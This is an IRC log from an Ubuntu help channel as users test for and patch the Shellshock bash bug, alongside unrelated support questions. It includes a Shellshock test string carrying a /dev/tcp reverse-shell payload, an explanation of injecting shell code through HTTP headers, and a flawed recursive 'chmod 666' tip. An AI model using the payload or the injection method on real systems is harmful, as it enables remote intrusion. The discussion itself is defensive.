[03:36] <sgtsaughter> the computer is a new custom build...im assuming its a graphics card issue because thats what i mostly hear are common issues.  Is there a way to install ubuntu and bypass the gui part of the installation
[03:37] <yzx> bkjr I want to need file created-itme
[03:37] <Bashing-om> !nomodeset | sgt
[03:38] <yzx> bkjr nautilus maybe have a plug-in
[03:38] <yzx> bkjr do you know it?
[03:39] <sgtsaughter> hey thanks for the response.  I've tried the nomodeset setting and then clicking either try ubuntu or install and it produces the same result
[03:40] <smart_developer> What is "hup" ?
[03:41] <Bashing-om> sgtsaughter: What graphics card ?
[03:42] <antonio__> I'm trying to convert a .mov audio file from an interview I did today.  The guy sent me the .mov file.  When I listen to the .mov file I only hear myself.  If I use an online .mov to .mp3 convertor I can only hear his voice.  Does anyone know of a way where I can convert a .mov file on ubuntu to an .mp3 and have both channels?
[03:42] <diverdude> i want to test if my system is vulnerable to the new shellshock vulnerability, so i do:  env test='() { ignored;};/bin/bash -i >& /dev/tcp/127.0.0.1/55555 0>&1' bash -c "pwd" which results in bash: connect: Connection refused bash: /dev/tcp/127.0.0.1/55555: Connection refused Segmentation fault (core dumped). But if i just do: env test='() { ignored;}; echo "Vulnerable"' bash -c true    it prints out vulnerable. Does that mean my system
[03:42] <sgtsaughter> Bashing..i have a nvidia geforce gt 740
[03:42] <diverdude>  is vulnerable or not?
[03:43] <zzxc> THats a werid test script...
[03:43] <zzxc> Try this: x='() { :;}; echo vulnerable' bash
[03:43] <stn> hellow guys
[03:44] <zzxc> hey stn
[03:44] <sgtsaughter> Bashing-om: nvidia geforce gt 740
[03:44] <stn> the last ubuntu's verson run on CD boot ?
[03:44] <nestle33> diverdude try what zzxc said
[03:44] <diverdude> zzxc, that says vulnerable
[03:44] <nestle33> then u need to update
[03:44] <nestle33> lsb_release -a what version are you on?
[03:44] <zzxc> diverdude: Yep. I'm in the same boat.
[03:45] <diverdude> aha, thanks :)
[03:45] <Bashing-om> sgtsaughter: Humm.. "nomodeset' should work. When you boot the install DVD do you choose that option from F6 @ boot options screen ?
[03:45] <sgtsaughter> Bashing-om: yes thats exactly what i do
[03:45] <nestle33> zzxc i dont get it. why am i not vulnerable but you and diverdude are?
[03:46] <zzxc> nestle33: ? Have you do the update.
[03:46] <diverdude> nestle33, i have not updated or patched my system yet
[03:46] <Bashing-om> sgtsaughter: Maybe, try the "acpioff" option. See what happens .
[03:46] <sgtsaughter> Bashing-om: ive tried this with 14.04.1 and with 12.04...when i try it with 12.04 i get to a screen that just says Ubuntu 12.04 with some dots that make it look like its loading but then eventually freezes too
[03:47] <bkjr> yzx, i couldn't find a reliable way to do that. only some filesystems store created time. check out http://askubuntu.com/questions/470134/how-to-find-the-creation-time-of-a-file
[03:47] <sgtsaughter> Bashing-om: should i try the acpioff option with nomodeset or just acpioff option alone
[03:47] <diverdude> nestle33, so when is a system vulnerable to this? I mean no normal linux exposes a bash script to people who have not been logged in via ssh already
[03:47] <Bashing-om> sgtsaughter: I would try both ways.
[03:48] <diverdude> zzxc, ^
[03:48] <nestle33> zzxc he said he is vulnerable. you said you are in the same boat. im asking why? why dont you update ubuntu
[03:48] <bkjr> antonio__, what's your player?
[03:48] <antonio__> bkjr: vlc player I think....
[03:49] <antonio__> When I play the .mov I only hear my side of the interview..when I use ffmpeg to convert it to an mp3 I only hear his side...really really weird
[03:49] <yzx> bkjr Thanks!Do you know some nautilus plug-ins?Please introduce
[03:50] <sgtsaughter> Bashing-om: when i try with just acpioff i get what looks like a big wall of text of an error code with the last line reading "Kernel panic - not synching: Attempted to kill init! exitcode=0x00000009"
[03:52] <Bashing-om> sgtsaughter: Not good, did you md5sum on the .iso file ? How did you burn the .iso file ? .. maybe a bad burn here ?
[03:54] <zzxc> diverdude, nestle33. I'm currently in the process of it. But I have active users right now... I'm running a test run. I'll follow up after midnight.
[03:54] <sgtsaughter> Bashing-om: i checked the md5sum on the iso file matched with the documentation here https://help.ubuntu.com/community/UbuntuHashes
[03:55] <bkjr> antonio__, what was your ffmpeg command?
[03:55] <Peng> diverdude: Lots of systems expose bash to remote users. For example, web servers with CGI scripts, or the DHCP client.
[03:55] <nestle33> well id consider this almost like an emergency
[03:55] <sgtsaughter> Bashing-om: i burned the iso twice and followed the directions here https://help.ubuntu.com/community/BurningIsoHowto (burnt from an ubuntu machine)
[03:55] <nestle33> like to me theres nothing wrong wiht just doing an emergency maintenance. the users will get over it
[03:55] <diverdude> Peng, what about apache using modwsgi?
[03:55] <Bashing-om> sgtsaughter: Good, ok, verify the disk .. boot to the boot options screen and choose " check disk for defects" .. will take a bit to check, then will have you to reboot.
[03:56] <zzxc> nestle33: Yeah. I know. Dear god trust me I know. This is my freaking nightmare. Unfortantly, clients can have time sensive stuff.
[03:56] <fkl> is 11.10 (oneiric) repo support completely phased out?
[03:57] <Peng> fkl: yes
[03:57] <fkl> no wonder. (Failed to fetch http://ca.archive.ubuntu.com/ubuntu/pool/universe/c/compizconfig-settings-manager/compizconfig-settings-manager_0.9.5.92-0ubuntu1_all.deb 404  Not Found)
[03:57] <bkjr> antonio__, i'd try -ac 2 just in case
[03:58] <Peng> fkl: You can use old-releases.ubuntu.com, to immediately upgrade to a distro that isn't old and insecure and unsupported.
[03:58] <Peng> diverdude: Probably okay, but I'm not certain.
[03:58] <sgtsaughter> Bashing-om: when i check disk for defects it does the same thing just goes to a black screen with a blinking white cursor and then eventually freezes...thanks for your help by the way i really appreciate it
[03:58] <fkl> Peng: I'd much rather upgrade at a later time, is there a way for me to install the above package (ccsm)?
[03:59] <diverdude> Peng, so how would somebody actually use this? somehow embed a bash script in an http request for the apache to execute?
[03:59] <xangua> fkl: isn't two years out of support enought later time¿
[03:59] <zzxc> Ever have that moment where you wonder why something is taking so long only to find out you forgot to hit enter?
[03:59] <sgtsaughter> Bashing-om: ive been looking through all the documentation on this issue all night i feel like ive tried everything
[04:00] <Peng> diverdude: CGI sets environment variables from HTTP headers and such, e.g. the User-Agent header becomes the HTTP_USER_AGENT environment variable.
[04:00] <sgtsaughter> Bashing-om: ive been able to get through a windows 7 install process fine ( i didnt actually install it just wanted to run another install process to rule out this being a hardware issue because its a custom built pc)
[04:00] <Peng> diverdude: So you'd set the User-Agent or Host or whatever to a little bit of shell scripting, yes.
[04:00] <orb__> A few years ago I played a game no Ubuntu that had you control a small (sorf-of billiard) ball with your mouse (or keyboard), and you had to defeat other balls by pushing them against the walls of the screen.  There were upgrades for mass and acceleration.  Does anyone remember the name of the game?
[04:00] <diverdude> Peng, hmm ok.
[04:01] <Bashing-om> sgtsaughter: Well, ummm .. at this point I would take that disk to another machine and see if it boots. We must eliminate a possible bad disk .
[04:02] <diverdude> Peng, so an evil attacker could just fire up curl and send some http request with user-agent containing shell script to a vulnarable apache server and tada?
[04:03] <Bashing-om> sgtsaughter: Then it is not the disk, huh ..Now I just do not know what to advise. You might try each of the F6 options and see what results with each. What processor do you have ?
[04:03] <Peng> diverdude: Yup!
[04:03] <zzxc> diverdude: Yeah, pretty much. Scary huh?
[04:03] <diverdude> zzxc, yikes...im getting this patched
[04:03] <Peng> Yup.
[04:04] <diverdude> how could that be missed by the bash devs
[04:04] <zzxc> Well its something thats been there for the last 25 years or so.
[04:04] <sgtsaughter> Bashing-om: i have an intel core i5
[04:05] <diverdude> zzxc, heh and nobody knew about it
[04:05] <lotuspsychje> that new bash exploit also affects ubuntu?
[04:05] <diverdude> zzxc, makes me think about how many vulnerabilities my system have which i dont know :D
[04:05] <diverdude> lotuspsychje, yes
[04:06] <lotuspsychje> diverdude: is there a fix already?
[04:06] <diverdude> lotuspsychje, no idea
[04:06] <diverdude> lotuspsychje, yes there is
[04:06] <diverdude> lotuspsychje, just update from apt
[04:06] <Bashing-om> sgtsaughter: I have heard of no problems with the i5 system .. Intell like 'buntu. Maybe look in bios and see what you can change ( MMIOU ??).
[04:06] <zzxc> diverdude: Yeah, heartbleed was there for a few years too if I remeber right
[04:07] <lotuspsychje> diverdude: lemme check detailed updates
[04:07] <zzxc> !shellshock
[04:07] <zzxc> lotuspsychje: ^
[04:07] <lotuspsychje> zzxc: tnx for that trigger
[04:07] <zzxc> =]
[04:08] <coolstar> hi, I'm using Ubuntu 14.04 on my laptop
[04:08] <coolstar> at school we need to use a proxy autoconfig to access some websites though
[04:09] <coolstar> I set it in system settings and it works fine in most apps
[04:09] <coolstar> however I can't get wine to use the proxy
[04:10] <lotuspsychje> zzxc: Preparing to unpack .../bash_4.3-7ubuntu1.3_amd64.deb ...
[04:10] <lotuspsychje> Unpacking bash (4.3-7ubuntu1.3) over (4.3-7ubuntu1) ...
[04:10] <lotuspsychje> :p
[04:11] <lotuspsychje> !info bash
[04:11] <sgtsaughter> Bashing-om: yeah i read a lot about this issue being connected to UEFI in the BIOS but i havent been able to wrap my head around where those settings are on my BIOS settings and what exactly i have to turn off
[04:11] <zzxc> lotuspsychje: Huh, its out of date. Not really that suprizing though.
[04:12] <zzxc> I'm lazy I just run unattended-upgrade
[04:12] <Bashing-om> sgtsaughter: I regret I can offer no more. I am calling it a night and wish you well with finding the cause. I Will be back tomorrow,
[04:12] <lotuspsychje> zzxc: wich version you have?
[04:13] <Robbie_Crash> I have a server with only a single login, I changed my shell and must've typo'd the new shell in /etc/passwd and cannot log in. Is my best bet running a live cd and editing it or is there an alternative?
[04:13] <sgtsaughter> Bashing-om: thanks a lot for your help im gonna call it a night too.  It was good debugging this with someone else just to keep a sanity check.  Thanks again!!
[04:13] <zzxc> Same as you, but ubottu is out of sync.
[04:13] <lotuspsychje> zzxc: ubottu needs little time to sync
[04:14] <Bashing-om> sgtsaughter: Times of troubles, 2 heads are better then 1, here there are many heads and given time we will find out the fault.
[04:14] <lotuspsychje> zzxc: tnx again for the shellshock hint
live cd is good
[04:15] <Robbie_Crash> thanks
[04:17] <coolstar> is there a way I can get wine to use a proxy autoconfig?
[04:18] <fkl> Peng, thanks. Adding the appropriate repos on old-releases.ubuntu.com in sources.list worked :-)
[04:22] <abru> Anyone know if doing do-release-upgrade will blow away my configurations and installed apps?
[04:22] <Fall> yeah! who needs underscores anyway
[04:22]  * Fall goes back to idling
[04:23] <bkjr> abru, it'll ask you if you want to keep them or update
[04:23] <abru> I need to go from ubuntu server 13.04 to 14.04
[04:24] <xangua> !eol | abru
[04:26] <abru> how does it work if you keep them?
[04:27] <zzxc> lotuspsychje: No. glad I was able to help
[04:27] <Grimlock1182> how toset the evolution mail and calendar im using my hotmail address?
[04:28] <lotuspsychje> !cookie | zzxc
[04:29] <zzxc> lotuspsychje: Hahaha =]
[04:29] <coolstar> is there a way for me to force an app to use a SOCKS proxy?
[04:29] <nestle33> tsocks
[04:29] <nestle33> apt-get install tsocks
[04:30] <nestle33> then find examples for tsocks on google
[04:30] <nestle33> you'd do it like tsocks ./file.sh i think
[04:30] <coolstar> nestle33: let me check that out
[04:31] <coolstar> nestle33: is there a way I can config tsocks to use a proxy autoconfig file?
[04:32] <diverdude> zzxc, hmm i just tried to see if i could break my apache/php server with the shellshock...and php seems to be save...at least i did not manage to break in. Probably its only servers running cgi scripts like pearl which have the vulnerability
[04:32] <diverdude> zzxc, im guessing most servers today dont run perl scripts as web scripts
[04:35] <abru> That EOLUpgrades page is kinda out of date
[04:36] <zzxc> diverdude: Yeah, less and less. But they are still out there.
[04:36] <zzxc> Hoenstly the big threat of this less short term and more the botnet of old machines.
[04:37] <diverdude> zzxc, there was also some problem with DHCP right?
[04:37] <Peng> diverdude: yes
[04:38] <Peng> diverdude: dhclient sets environment variables using input from the DHCP server and runs shell scripts.
[04:38] <zzxc> Though the short term is pretty terrifying. But long time, routers, printers, imbeded systems that don't get an update will end just be there on the net. Its like the telpocoplies all over again.
[04:39] <diverdude> zzxc, like in a botnet?
[04:40] <zzxc> Yeah, or what ever else you want it to do.
[04:40] <ItsMeLenny> would anybody know roughly how many MB the upgrade is from 12.04 to 14.04.1?
[04:41] <diverdude> zzxc, well hacking is actually pretty defficult....not so many people know how to do it
[04:41] <Robbie_Crash> bkjr thanks, all good now. :)
[04:41] <coolstar> is there a way for me to configure tsocks to use a proxy autoconfig file?
[04:43] <sennn> hello
[04:43] <zzxc> Eh I mean it doesn't take that much to set it up and have a botnet set up to expand.
[04:43] <diverdude> zzsoo
[04:43] <diverdude> zzxc, soo
[04:43] <cfhowlett> ItsMeLenny, 1.5 gigs
[04:44] <zzxc> diverdude: Heads up I'm about to be super distracted for a while
[04:44] <ItsMeLenny> damn thats big
[04:44] <diverdude> zzxc, how so?
[04:45] <zzxc> diverdude: System Ops stuff, put out a notice to our users a second ago.
[04:45] <zzxc> a while ago *
[04:45] <diverdude> zzxc, oh wauw.
[04:54] <ndirikufunda> ndiepe shamwari
[04:54] <smart_developer> Hi everyone, what is the difference between "ps -eLf" and "ps axms" ?
[04:57] <ndirikufunda> does riseup.net have shell and web space?
[04:58] <ndirikufunda> and not just email
[04:58] <ndirikufunda> i want to configure everything with my riseup.net account using ubuntu
[04:58] <ndirikufunda> :-)
[05:07] <netlar> I am on a Mac, that has not patched for Shellshock, how can I tell if someone has already hacked my system
[05:07] <cfhowlett> ItsMeLenny, 14.04.1 desktop = 1 GB = use torrents to get it
[05:07] <sivik> anyone have any luck with window tearing and nvidia and xfce?
[05:08] <sivik> netlar, do you know how to check for logged in accounts?
[05:08] <netlar> sivik: nope
[05:09] <sivik> Thats the easiest way to do it.  Do you even know how to open terminal?
[05:09] <sivik> http://unix.stackexchange.com/questions/14127/how-to-know-when-and-which-user-logged-into-the-system-under-mac-os-x-last-is-n
[05:09] <netlar> sivik: yes
[05:10] <sivik> http://osxdaily.com/2014/03/25/see-users-who-connected-to-mac/
[05:10] <sivik> and you should probably find a mac channel and ask in there as its probably way different than ubuntu.
[05:11] <netlar> ok, just check my ubuntu box, it is fine, just found out my mac was not
[05:11] <cfhowlett> netlar, mac channels are the place to ask about OSX
[05:18] <netlar> they are little slower then you guys
[05:19] <cfhowlett> netlar, osx is not linux.  linux is not osx.  consider your sources.
[05:19] <netlar> As in how helpful they will be?
[05:19] <cfhowlett> netlar, as in the quality of information you get.
[05:20] <bkjr> abru, you get 3 options: view diff/keep old config/upgrade to new default. you probably want to see the diff first
[05:20] <netlar> cfhowlett: I will just call them tomorrow
[05:50] <TyrfingMjolnir> How do I change my sources.list to cdn?
[05:51] <TyrfingMjolnir> sources.list is open, which URI to use?
[05:54] <squinty> TyrfingMjolnir:  use your Update Manager or "Software Updates" to change servers. there is a toggle server menu on the Ubuntu Software tab.  switch it to canada
[05:55] <squinty> TyrfingMjolnir:  you can also use Synaptic Package manager to do the same too.
[05:56] <TyrfingMjolnir> squinty: ?
[05:56] <TyrfingMjolnir> I use ssh
[05:56] <TyrfingMjolnir> and apt
[05:56] <TyrfingMjolnir> I m not installing a GUI to change repo
[05:56] <squinty> ok whatever
[05:57] <karab44> hello
[05:57] <karab44> my clock simply disapeared in menu bar
[05:57] <TyrfingMjolnir> I m asking for the URL for the CDN ubuntu repo
[05:58] <bkjr> what's cdn
[05:58] <karab44> and time & date settings is like inactive for clock. What happenes? I wanted to check my time.
[05:59] <somsip> TyrfingMjolnir: there is no cdn repo. You choose a repo that is fast for you
[05:59] <TyrfingMjolnir> I thought ubuntu was a debian derivative
[05:59] <TyrfingMjolnir> cdn is somewhat new, I expected ubuntu to have done this before debian, my fault
[06:00] <TyrfingMjolnir> bkjr: content distribution network (CDN)
[06:01] <ifireball> TyrfingMjolnir: there is probably a mirror auto-selection script in the repos, but quickly looking at packages with 'mirror' in their name I don't see one that pops up as such, if you remember what is was called in Debian, its the same
[06:02] <TyrfingMjolnir> cdn.debian.org
[06:02] <ifireball> TyrfingMjolnir: I meant the package not the host
[06:03] <TyrfingMjolnir> There is a protocol mirror implementation AFAIK
[06:03] <TyrfingMjolnir> instead of http:// type mirror;
[06:06] <bipul> Hello, I think trusty is vulnerable from shellshock "bash bug". How i can patch this.
[06:07] <wolegroon> Hello guys. I just tried installing ubuntu on an old computer, but the install failed, now it won't boot from cd or anything. Can anyone help me troubleshoot what the problem might be?
[06:07] <ifireball> bipul: its in the repos
[06:07] <squinty> bipul: if you so your software updates it will pull in the new bash
[06:07] <TyrfingMjolnir> wolegroon: Sure
[06:07] <Flannel> bipul: `sudo apt-get update && sudo apt-get upgrade`
[06:08] <ifireball> bipul: But its not as vulnerable as other distros because 'sh' is 'dash' and not 'bash' by default
[06:23] <paintDC> ronald
[06:23] <paintDC> hey guys how are you doing
[06:24] <littlephil> hey
[06:39] <somsip> squinty: I admit I can't see how some of the vulnerability checks still seem to work under 1.3, but I guess we have to trust that this time it really is fixed.
[06:39] <squinty> somip:  keeping fingers crossed. :)
[06:40] <somsip> squinty: I still have faith in OSS. The found that the first patch didn't work. They'll find if anything else is still wrong given the focus on this right now
[06:45] <mulga> hey guys, what's the best/easiest way to dump a debug.log from a console only VPS, so i can either copy it or send it (email eventually) to someone?
[06:50] <hateball> mulga: just scp it somewhere?
[06:50] <hateball> "a debug.log" is rather... unspecific
[06:52] <mulga> replace "debug.log" with foo.txxt then
[06:52] <mulga> *foo.txt
[06:52] <somsip> mulga: what do you really want? A full dump of all output from the VPS client?
[06:53] <Romance> upgraded my ubuntu 14.04, and now ctrl + alt + z dont work for Artha dictionary, it doesnt give me that gnome notification thing
[06:53] <hateball> mulga: If you just want to send a file somewhere, use scp
[06:53] <hateball> !scp
[06:54] <mulga> hateball: i'm not familiar with scp, but  will check out man pages and see how i go. thanks for your help
[06:55] <mulga> and thankyou !bot
[06:56] <hateball> mulga: scp requires a running ssh-server on one end at least
[06:57] <mulga> hateball: righto. no
[07:04] <lkthomas> hey guys
[07:04] <lkthomas> does MAAS could be use to provision general server ?
[07:04] <mulga> hateball: *righto. np
[07:17] <agent_white> testing!
[07:17] <somsip> !test | agent_white
[07:17] <Flannel> somsip: No, he can't in this case.
[07:18] <somsip> Flannel: the test or the vps question?
[07:18] <agent_white> Awesome! Thanks again Flannel!
[07:20] <hardydash> Quit
[07:20] <hardydash> screen
[07:21] <hardydash> screen
[07:21] <hardydash> Quit
[07:25] <kjelle> .o/
[07:35] <bcvery1> exit
[07:51] <AceLan> Hi, when doing apt-get update, there is "Hit http://archive.ubuntu.com utopic/multiverse Translation-zh_TW" that contains the translation of the packages description. Can I add my own translation from a PPA?
[07:55] <Hightower_> Morning all
[07:55] <Hightower_> This bash security issue - I'm guessing updating bash to latest version will patch the issue?
[07:57] <AceLan> Hightower_: you can try it yourself, you shouldn't see "XD" if patched # env x='() { :;}; echo XD' bash -c "echo This is a test code"
[07:59] <somsip> Hightower_: yes
[08:06]  * Sunstream snickers. He found himself a life (Potion) in the game he is playing.
[08:13] <antonio__> Anyone around?
[08:14] <rwsq1> hi antonio__
[08:14] <antonio__> hey
[08:14] <antonio__> I'm trying to convert a .mov audio file from an interview I did today.  The guy sent me the .mov file.  When I listen to the .mov file I only hear myself.  If I use an online .mov to .mp3 convertor I can only hear his voice.  Does anyone know of a way where I can convert a .mov file on ubuntu to an .mp3 and have both channels?
[08:14] <antonio__> When I play the .mov I only hear my side of the interview..when I use ffmpeg to convert it to an mp3 I only hear his side...really really weird
[08:14] <rwsq1> yeah that's weird :)
[08:15] <imfede> strange. i would try to poen it in audacity and see how it's made. and than you can export it in mp3
[08:15] <rwsq1> I guess you may need to pull out both audio streams and recombine them
[08:15] <antonio__> imfede: can't open it in audacity.  Its a .mov file
[08:15]  * Sunstream roars madly....
[08:16] <Sunstream> I installed the ubuntu version of Silverlight and tried to go to the website again to play the content and it still says I need to install it despite restarting my browser..... (Firefox)
[08:16] <Sunstream> anyone here help me with the Silverlight issue?
[08:16] <agent_white> antonio__: Did you end up trying out `ffprobe` on your .mov file?
[08:17] <imfede> even with ffmpeg? i'm pretty sure there is a way to do it
[08:17] <agent_white> ffmpeg or mplayer should be able to handle it. Just gotta dissect the file first :)
[08:19] <lorenzo_> @find Lillian Roxon
[08:20] <theperfectpunk> how do i start a shell file from terminal as a seperate thread
[08:20] <theperfectpunk> the script launches an application
[08:20] <antonio__> hey agent_white: yes I did..you want the pastebin of it?
[08:20] <theperfectpunk> i don't want to keep the terminal running
[08:20] <agent_white> antonio__: Sure thing!
[08:20] <xangua> Sunstream: the ubuntu version of Silverlight? If you mean moonlight it hasn't been developed for years
[08:21] <Sunstream> nods
[08:21] <agent_white> theperfectpunk: You mean you want to start it in the background? Just append a "&" to the end of the name.
[08:21] <Sunstream> I see that
[08:21] <Sunstream> its not being reconized by audible.com so I guess I have to use my tablet to play my content
[08:21]  * Sunstream shakes his head.
[08:21] <johelish> I can't access my server via the internet atm. When I ping my server it says "From 80.248.225.1: icmp_seq=3 Redirect Host(New nexthop: ser147.wizardgoonies.com (127.0.0.1))"
[08:22] <johelish> Is it hacked?
[08:22] <antonio__> agent_white: here you go http://pastebin.com/NestsRmh
[08:22] <theperfectpunk> agent_white: thanx, by the way i got something as output after executing the shell script - two numbers, what is that?
[08:22] <rwsq1> looking into shellshock - anyone know if ubuntu servers are vulnerable via an apache cgi route?
[08:22] <agent_white> theperfectpunk: That's the PID of that process you send to the background.
[08:22] <theperfectpunk> agent_white: [1] 12188
[08:22] <spikeb> rwsq1,  http://arstechnica.com/security/2014/09/bug-in-bash-shell-creates-big-security-hole-on-anything-with-nix-in-it/ has info on how you can test
[08:22] <theperfectpunk> and what is the [1]?
[08:22] <rwsq1> I've tried the online tests which say they aren't - is this because apache uses /bin/sh not /bin/bash
[08:22] <Sunstream> I wish websites would be a little more universal. I guess I will have to go into WINE/IE maybe to get it to work
[08:23] <agent_white> theperfectpunk: So if you went `ps aux | grep 12188` you should see the name of your process on the line.
[08:23] <imfede> theperfectpunk, its the job number, used only in the current shell for doing "fg %<job number>"
[08:23] <agent_white> theperfectpunk: That's the counter of the number of jobs you sent to the background. type `jobs`
[08:24] <theperfectpunk> agent_white: if i send another process to background it will output 2 then?
[08:24] <agent_white> Yes!
[08:24] <theperfectpunk> thank u guys :-)
[08:25] <agent_white> And if you forget to do "&", next time just hit Control+z
[08:26] <agent_white> Damned, he left! :(
[08:26] <agent_white> antonio__: Can you pastbin the output of `ffprobe file.mov` instead of the mp3?
[08:26] <agent_white> ffprobe the original mov file.
[08:27] <antonio__> here you go http://pastebin.com/MyNuRYss
[08:27]  * Sunstream shakes his head again.
[08:29] <Sunstream> "While Silverlight can be installed on Linux based computers, Linux users will not have the ability to use the Audible cloud player at this time." (Sad)
[08:30] <isene> For the font-guys here:
[08:30] <Sunstream> Anyone tell me is there a way to trick the silverlight to work and act like I am in a windows pc or will I have to actually go into WINE and try in there
[08:31] <isene> Still have antialias fonts despite removing it in gconf-editor and dconf-editor and in my gtkrc-2.0 (via lxappearance). Any other places I need to look?
[08:31] <isene> I want the antialiasing GONE!
[08:31] <imfede> Sunstream, idk but it's a M$ technology, i wouldn't be surprised if it can't work with linux
[08:31] <spikeb> Sunstream, http://pipelight.net/cms/
[08:32] <spikeb> pipelight + a user agent changer should do the trick
[08:32] <Hightower_> I have an old version of 8.04 that I sort of forgot about, I need to upgrade it to a supported version and I found this command to run an upgrade to 10.04: gksu "sh /cdrom/cdromupgrade"
[08:32] <Sunstream> what is so darned special for Silverlight anyways.. a "easy to program" bs
[08:32] <Hightower_> However, the 8.04 system doesn't have gksu installed, and it won't install because the repos are now out of date
[08:33] <mike> hey guys
[08:33] <Hightower_> Is there a way to install it so I can run the upgrade to 10.04, or a different way of running the upgrade?
[08:33] <Guest17488> my machine is vulnerable to shell shock
[08:33] <Guest17488> but i cant seem to update with sudo apt-get install --only-upgrade bash
[08:33] <k1l> !eol | Hightower_
[08:33] <Guest17488> it says already the newest version
[08:33] <OerHeks> Hightower_, 10.04 desktop is EOL too, better download the latest
[08:33] <k1l> Guest17488: what ubuntu are you on?
[08:33] <Hightower_> I know it's eol
[08:33] <geirha> Guest17488: which release?  lsb_release -r
[08:33] <Guest17488> 13.10
[08:33] <Hightower_> But the upgrade process is 10.04 -> 12.04 and so on right?
[08:34] <k1l> Hightower_: see, the upgrade procedure for eol mentioned by the bot
[08:34] <Hightower_> Ah thanks buddy
[08:34] <k1l> Guest17488: you dont get any security updates anymore. so upgrade to 14.04 first
[08:34] <Guest17488> is that apt-get upgrade?
[08:34] <Guest17488> oh dist upgrade isnt it
[08:35] <k1l> Guest17488: no. its "sudo do-release-upgrade"
[08:35] <Guest17488> never heard of that cool thanks!
[08:35] <agent_white> antonio__: I poked through the man pages, may have found it :)
[08:36] <agent_white> Maybe... hmmm
[08:38] <Guest17488> i did do-release-upgrade
[08:41] <antonio__> agent_white: go on ;)
[08:43] <agent_white> antonio__: Real quick first -- try `ffmpeg -i INPUT.mov -ac 2 OUTPUT.wav`
[08:43] <agent_white> antonio__: Let me know what it does, and a pastebin of `ffprobe OUTPUT.wav`
[08:43] <antonio__> encoding
[08:44] <agent_white> antonio__: It's working on it? Or failed?
[08:44] <hacker> hey
[08:45] <antonio__> brb
[08:45] <antonio__> http://pastebin.com/BJJ7DvVi
[08:45] <c0ffee_> hello, i just added changes through apt-get to system from this answer http://askubuntu.com/questions/399774/annoying-viber-notification. How to revert changes?
[08:46] <agent_white> antonio__: Shoot me a PM when you're back. :)
[08:46] <k1l> !ppa-purge | c0ffee_
[08:47] <fuser312> Hello, everyone. Its my first time in this IRC, so how's everyone's ubuntu
[08:47] <c0ffee_> thank you k1l
[08:50] <Hightower_> Cheers for your help this morning guys, greatly appreciated
[08:50] <Hightower_> :D
[08:56] <isene> Any font-guys or font-girls around?
[09:03] <Guest17488> ok so im getting loads of errors now after doing the upgrade
[09:04] <Guest17488> Give root password for maintenance or type Control D to continue
[09:04] <Guest17488> over nad over and over again
[09:07] <agent_white> Guest17488: What file does it say is corrupt?
[09:07] <Guest17488> it doesnt
[09:07] <agent_white> So those are the only things on the screen? Nothing above it?
[09:08] <agent_white> Guest17488: Take a picture of your screen when it says that, put it on imgur.com, and then show us that.
[09:11] <shal3r> what's the best way to update bash on ubuntu 13.10 without updating whole release to 14.04?
[09:11] <Hightower_> apt-get update && apt-get install bash
[09:11] <Hightower_> ^^ Is what I've been using
[09:11] <MadsRC> apt-get update && apt-get upgrade bash is what I've done :)
[09:11] <Guest87048> new
[09:11] <Guest87048> now
[09:11] <Guest87048> enter
[09:12] <MadsRC> Oh wait, isn't 13.10 EOL?
[09:12] <somsip> !13.10
[09:13] <somsip> shal3r: so no security updates for you
[09:13] <MadsRC> Yah, so no updates yeah
[09:13] <Z3> Hi, how can I disable metacity compositing in Ubuntu 14.04 using Gnome Flashback (metacity) ?
[09:13] <nezuvian> morning folks o/
[09:14] <MadsRC> Morning 07
[09:15] <Z3> previously it was done editing /etc/X11/xorg.conf
[09:15] <pam> agent_white: can I pm you..its antonio...mp3 dude :D
[09:15] <Z3> but not that file is not used
[09:16] <Z3> sorry. In current Ubuntu version that file is not used
[09:16] <Z3> so I need a way to disable metacity compositing using the Gnome Classic desktop (gnome flashback session(metacity))
[09:17] <litropy> Is there something wrong with my memory management setup? I have 2GB RAM and ~500MB swap. In Chrome, if I have too many tabs open, the comp just kinda sits there crunching. I have to ssh in and killall chrome just to do anything at all. Should I maybe expand swap? I've yet to check the status of swap when this happens, but it seems like it would be maxxed. 12.04
[09:19] <somsip> litropy: the usual rule of thumb for swap is 2xRAM, but that comes from the old days of MBs of RAM not GBs. But with what you describe, you almost certainly need more RAM or swap
[09:19] <somsip> litropy: can't you leave top running in ssh, and then open tabs and see if it does over-use memory?
[09:20] <litropy> someone, I can. but I've been very busy.
[09:21] <litropy> somsip, ^^
[09:21] <litropy> so, gparted, then?
[09:21] <somsip> litropy: irrespoective, it seems the first step to a solution
[09:21] <litropy> somsip, if swap is confirmed to be maxxing ^^
[09:22] <litropy> I'm certain RAM is maxxing.
[09:22] <somsip> litropy: gparted will allow you to change the swap partition size, yes
[09:22] <litropy> somsip, thx.
[09:22] <somsip> litropy: all usual caveats apply - backup first
[09:22] <litropy> yep :-D
[09:24] <litropy> somsip, just fyi, it happens while I'm working, and if I wait too long, the comp locks so tightly that it won't even respond to an ssh'ed shell command.
[09:25] <agent_white> Also need to look into tuning your swappiness.
[09:25] <litropy> somsip, Ah, the joys of having your main comp die, then having to use your puny early 2000's server box.
[09:25] <somsip> litropy: find a way to dump free -h to a file every few secs. Something using top or a memory-related version of iostats
[09:26] <litropy> agent_white, I didn't know I could do that.
[09:26] <agent_white> litropy: http://rudd-o.com/linux-and-free-software/tales-from-responsivenessland-why-linux-feels-slow-and-how-to-fix-that
[09:26] <agent_white> :)
[09:27] <agent_white> litropy: Aye, you basically can tune it to prioritize one over the other.
[09:27] <somsip> litropy: free -h -s 1 > /tmp/memory_log
[09:27] <HellTiger_NB> hello, ca some one suggest a cloud drive with apt updates, like dropbox or google drive?
[09:28] <litropy> nice, agent_white
[09:30] <litropy> somsip, free: invalid option -- 'h'
[09:30] <litropy> procps version 3.2.8
[09:31] <somsip> litropy: perfectly cromulent option. Did you -h or just 'h'
[09:31] <balle_> Greetings! How do I recursivly make all files and folder within a folder like 666?
[09:31] <litropy> somsip, http://paste.ubuntu.com/8431629/
[09:31] <somsip> balle_: chmod 666 -R /path/to/folder
[09:32] <somsip> litropy: what version of ubuntu are you running?
[09:32] <litropy> 12.04
[09:32] <somsip> litropy: well, just -m then I suppose. -h gives human readable output, so -m will do
[09:33] <litropy> AKA "The Only Version That Safely Runs On This Tin Can"
[09:33] <litropy> Or, I should say, the max version.
[09:33] <somsip> litropy: afk
[09:40] <debi> will apt-get update && apt-get install bash patch shellshock?
[09:41] <Hightower_> It's been working for me
[09:41] <polikit> Is it safe to run do-release-upgrade from 12.04.5 LTS to 14.04.1 LTS? It's LAMP server + OpenVPN
[09:41] <debi> Hightower_:tlaking to me?
[09:43] <debi> will apt-get update && apt-get install bash patch shellshock?
